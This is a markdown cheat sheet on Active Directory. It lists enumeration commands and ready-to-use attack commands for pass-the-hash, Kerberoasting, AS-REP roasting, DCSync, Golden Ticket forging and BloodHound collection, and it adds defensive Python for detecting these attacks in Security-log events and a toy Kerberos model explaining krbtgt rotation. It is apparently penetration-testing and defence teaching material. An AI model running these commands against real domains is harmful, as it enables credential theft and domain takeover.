# Active Directory Basics

## Key Concepts

| Term | Description |
|---|---|
| Domain | Logical group of network objects |
| Forest | Collection of one or more domains |
| DC | Domain Controller — authenticates users |
| OU | Organizational Unit — container for objects |
| GPO | Group Policy Object — settings applied to users/computers |
| SID | Security Identifier — unique ID for every object |
| LDAP | Protocol used to query AD |
| Kerberos | Authentication protocol used by AD |
| NTLM | Legacy authentication protocol |

## Enumeration

```powershell
# Domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$env:USERDOMAIN
$env:LOGONSERVER

# Using net commands
net user /domain                    # All domain users
net group /domain                   # All domain groups
net group "Domain Admins" /domain   # Members of Domain Admins
net accounts /domain                # Password policy

# PowerView
Get-NetDomain
Get-NetUser
Get-NetGroup
Get-NetComputer
Get-NetDomainController
Find-LocalAdminAccess               # Find hosts where the current user is a local admin
```

## Kerberos Authentication Flow

1. Client → KDC: AS-REQ (request TGT)
2. KDC → Client: AS-REP (TGT encrypted with the krbtgt hash)
3. Client → KDC: TGS-REQ (request service ticket using the TGT)
4. KDC → Client: TGS-REP (service ticket)
5. Client → Service: AP-REQ (authenticate with the service ticket)

## Common AD Attacks

### Pass the Hash (PtH)

```
# Use NTLM hash instead of password
mimikatz # sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:cmd.exe

# With impacket
python psexec.py domain/user@IP -hashes :NTLMHASH
```

### Kerberoasting

```
# Find SPNs
Get-NetUser -SPN | Select SamAccountName, ServicePrincipalName

# Request and crack service tickets
# Impacket
python GetUserSPNs.py domain/user:pass -dc-ip IP -request

# PowerView + Rubeus (Rubeus writes to the file given by /outfile)
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt
.\Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt
```

### AS-REP Roasting

```
# Find users with Kerberos pre-auth disabled
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}

# Impacket
python GetNPUsers.py domain/ -usersfile users.txt -dc-ip IP -format hashcat

# Crack
hashcat -m 18200 hashes.txt wordlist.txt
```

### DCSync

Requires: replication rights (Domain Admins by default, or an account delegated those rights).
Mimics DC replication to pull NTLM hashes from the directory.

```
mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator

# Impacket
python secretsdump.py domain/user:pass@DC-IP
```
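The Kerberoasting, AS-REP Roasting and DCSync sections above each leave a distinct trace on the domain controller: 4769 service-ticket requests with RC4 encryption for user-account SPNs, 4768 TGT requests issued with PreAuthType 0, and 4662 directory accesses that exercise the replication control-access rights from something other than a DC. The following is an added example (not from the page or any of the tools it lists) that runs those three checks over constructed event records; the field names follow the EventData names in the Security log, but the records, host names, IPs and the `DC_ACCOUNTS` set are made up for the example.

```python
"""Triage rules for the three abuses above, run over constructed 4769/4768/4662
records. Added example; sample data is constructed, not real log output."""
from dataclasses import dataclass

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4; AES tickets are 0x11 / 0x12
# Control-access rights a DCSync caller needs on the domain object
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"


@dataclass
class Event:
    event_id: int
    data: dict   # EventData name -> value, all strings as they appear in the log


def is_machine_account(name: str) -> bool:
    return name.endswith("$")


def kerberoast_hits(events):
    """4769 (service ticket requested): successful RC4 tickets for user-account SPNs.
    Computer-account and krbtgt services are skipped; their keys are random and
    long, so an RC4 ticket for them is not a crackable target."""
    hits = []
    for e in events:
        if e.event_id != 4769 or e.data.get("Status") != "0x0":
            continue
        svc = e.data["ServiceName"]
        if svc == "krbtgt" or is_machine_account(svc):
            continue
        if e.data["TicketEncryptionType"].lower() == RC4_HMAC:
            hits.append((e.data["TargetUserName"], svc, e.data["IpAddress"]))
    return hits


def asrep_roast_hits(events):
    """4768 (TGT requested): TGTs issued with PreAuthType 0, i.e. the account has
    'Do not require Kerberos preauthentication' set and anyone could request it."""
    return [(e.data["TargetUserName"], e.data["IpAddress"], e.data["TicketEncryptionType"])
            for e in events
            if e.event_id == 4768 and e.data.get("Status") == "0x0"
            and e.data.get("PreAuthType") == "0"]


def dcsync_hits(events, dc_accounts):
    """4662 (operation on an object): replication rights exercised by a principal
    that is not a domain controller computer account."""
    hits = []
    for e in events:
        if e.event_id != 4662:
            continue
        who = e.data["SubjectUserName"]
        if who in dc_accounts:
            continue
        props = e.data.get("Properties", "").lower()
        if DS_REPL_GET_CHANGES in props or DS_REPL_GET_CHANGES_ALL in props:
            hits.append((who, e.data.get("ObjectName", "")))
    return hits


# Constructed sample records: one benign and one suspicious per event ID.
SRC = "::ffff:10.0.0.25"
REPL_PROPS = "Control Access {%s} {%s}" % (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)
SAMPLE_EVENTS = [
    Event(4769, {"TargetUserName": "alice@CORP.LOCAL", "ServiceName": "FS01$",
                 "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": SRC}),
    Event(4769, {"TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
                 "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": SRC}),
    Event(4768, {"TargetUserName": "alice", "PreAuthType": "2",
                 "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": SRC}),
    Event(4768, {"TargetUserName": "svc_backup", "PreAuthType": "0",
                 "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": SRC}),
    Event(4662, {"SubjectUserName": "DC02$", "ObjectName": "DC=corp,DC=local",
                 "Properties": REPL_PROPS}),
    Event(4662, {"SubjectUserName": "bob", "ObjectName": "DC=corp,DC=local",
                 "Properties": REPL_PROPS}),
]
DC_ACCOUNTS = {"DC01$", "DC02$"}   # constructed list of DC computer accounts


def triage(events=SAMPLE_EVENTS, dc_accounts=DC_ACCOUNTS):
    return {"kerberoast": kerberoast_hits(events),
            "asrep_roast": asrep_roast_hits(events),
            "dcsync": dcsync_hits(events, dc_accounts)}


if __name__ == "__main__":
    for name, hits in triage().items():
        print(name, hits)
```

These events only exist if the matching audit subcategories are on (Kerberos Service Ticket Operations for 4769, Kerberos Authentication Service for 4768, Directory Service Access plus a SACL on the domain object for 4662). The RC4 rule is noisy in estates with legacy hosts; the usual refinements are to correlate many distinct SPNs requested from one source in a short window, and to set service accounts to AES-only so that an RC4 request is itself the anomaly. The `dc_accounts` allow-list must be kept in step with the real DC list, since a DCSync from a compromised DC account is invisible to this rule.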

### Golden Ticket

Requires: the krbtgt NTLM hash.
Forges a TGT, valid for 10 years by default.

```
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:DOMAIN-SID /krbtgt:HASH /ptt
```
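The five-step flow in the Kerberos Authentication Flow section and the Golden Ticket entry above are two views of the same fact: the KDC trusts any TGT that decrypts correctly under the krbtgt key and copies its claims into service tickets without looking the user up again. The following toy model is an added example, not the page's code and not real Kerberos: a "ticket" is a JSON claim set sealed with an HMAC-SHA256 tag in place of Kerberos encryption, and the only property kept is that a verifier accepts a ticket only if it was sealed under a key it trusts. It walks the legitimate AS/TGS/AP exchange and then shows why a TGT minted with a leaked krbtgt key survives one krbtgt password reset (the KDC still honours the previous key) but not two. Principal names, keys, lifetimes and the fixed clock are constructed.

```python
"""Toy model of the AS-REQ/AS-REP, TGS-REQ/TGS-REP and AP-REQ steps, plus the
effect of rotating the krbtgt key on a forged TGT. Added example; HMAC stands in
for Kerberos encryption and all names, keys and times are constructed."""
import base64
import hashlib
import hmac
import json
import secrets

NOW = 1_700_000_000            # fixed clock so the example is deterministic
TGT_LIFETIME = 10 * 3600       # 10 hours, AD's default maximum TGT lifetime
TEN_YEARS = 10 * 365 * 86400   # lifetime a forged TGT carries by default


def seal(key: bytes, claims: dict) -> str:
    """Stand-in for 'encrypt under key': the claims plus an HMAC tag over them."""
    body = json.dumps(claims, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(body).decode() + "." + base64.b64encode(tag).decode()


def unseal(trusted_keys, token: str, now: int) -> dict:
    """Accept the token only if one of the trusted keys reproduces its tag and
    it has not expired; raise otherwise."""
    b64body, b64tag = token.split(".", 1)
    body, tag = base64.b64decode(b64body), base64.b64decode(b64tag)
    for key in trusted_keys:
        if hmac.compare_digest(hmac.new(key, body, hashlib.sha256).digest(), tag):
            claims = json.loads(body)
            if claims["expires"] <= now:
                raise ValueError("ticket expired")
            return claims
    raise ValueError("ticket was not sealed under a trusted key")


class ToyKDC:
    def __init__(self, user_keys: dict, service_keys: dict):
        self.user_keys = user_keys          # principal -> long-term key
        self.service_keys = service_keys    # SPN -> service account key
        # As in AD, the KDC keeps the current krbtgt key and the previous one so
        # that tickets issued just before a rotation keep working.
        self.krbtgt_keys = [secrets.token_bytes(32)]

    def rotate_krbtgt(self):
        self.krbtgt_keys = [secrets.token_bytes(32)] + self.krbtgt_keys[:1]

    def as_exchange(self, cname: str, preauth: str, now: int) -> str:
        # Steps 1-2: AS-REQ carries a timestamp sealed under the user's key
        # (pre-authentication); AS-REP returns a TGT sealed under the krbtgt key.
        ts = unseal([self.user_keys[cname]], preauth, now)
        if abs(ts["ts"] - now) > 300:
            raise ValueError("pre-auth timestamp outside the clock-skew window")
        groups = ["Domain Admins"] if cname == "Administrator" else ["Domain Users"]
        return seal(self.krbtgt_keys[0],
                    {"cname": cname, "groups": groups, "expires": now + TGT_LIFETIME})

    def tgs_exchange(self, tgt: str, spn: str, now: int) -> str:
        # Steps 3-4: the KDC checks only the TGT's seal and copies its claims into
        # the service ticket; the named user is never looked up again.
        claims = unseal(self.krbtgt_keys, tgt, now)
        return seal(self.service_keys[spn],
                    {"cname": claims["cname"], "groups": claims["groups"],
                     "spn": spn, "expires": now + TGT_LIFETIME})


def ap_exchange(service_key: bytes, ticket: str, now: int) -> dict:
    # Step 5: the service validates the ticket with its own key; the KDC is not
    # consulted, so the service acts on whatever claims the ticket carries.
    return unseal([service_key], ticket, now)


def make_preauth(user_key: bytes, now: int) -> str:
    return seal(user_key, {"ts": now, "expires": now + 300})


def legitimate_flow(kdc: ToyKDC, cname: str, spn: str, now: int = NOW) -> dict:
    tgt = kdc.as_exchange(cname, make_preauth(kdc.user_keys[cname], now), now)
    service_ticket = kdc.tgs_exchange(tgt, spn, now)
    return ap_exchange(kdc.service_keys[spn], service_ticket, now)


def rotations_to_invalidate(kdc: ToyKDC, leaked_key: bytes, spn: str, now: int = NOW) -> int:
    """Seal a long-lived TGT with a leaked krbtgt key (the Golden Ticket case) and
    count how many krbtgt rotations it takes before the KDC rejects it."""
    forged = seal(leaked_key, {"cname": "Administrator", "groups": ["Domain Admins"],
                               "expires": now + TEN_YEARS})
    for rotations in range(4):
        try:
            kdc.tgs_exchange(forged, spn, now)
        except ValueError:
            return rotations
        kdc.rotate_krbtgt()
    raise RuntimeError("forged ticket still accepted after several rotations")


if __name__ == "__main__":
    kdc = ToyKDC({"alice": b"a" * 32, "Administrator": b"A" * 32}, {"cifs/fs01": b"s" * 32})
    print(legitimate_flow(kdc, "alice", "cifs/fs01"))
    print("rotations needed:", rotations_to_invalidate(kdc, kdc.krbtgt_keys[0], "cifs/fs01"))
```

The model makes the remediation concrete: after a suspected krbtgt compromise the password has to be reset twice, because the KDC keeps accepting tickets under the previous key, and Microsoft's guidance is to let replication complete between the two resets so that legitimately issued tickets are not cut off at once. The second point the model shows is in `ap_exchange`: the service never asks the KDC, so group membership in a ticket is only as trustworthy as the key that sealed it.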

## BloodHound

Graph-based AD attack path analysis.

```powershell
# Collect data with SharpHound
.\SharpHound.exe -c All

# Or with PowerShell
Invoke-BloodHound -CollectionMethod All
```

Upload the ZIP to the BloodHound GUI, then query the shortest path to Domain Admins.

## Useful Tools

| Tool | Purpose |
|---|---|
| BloodHound | Attack path visualization |
| PowerView | AD enumeration |
| Rubeus | Kerberos attacks |
| Mimikatz | Credential dumping |
| Impacket | Remote AD attacks |
| CrackMapExec | Network-wide enumeration |
| ADExplorer | GUI AD browser |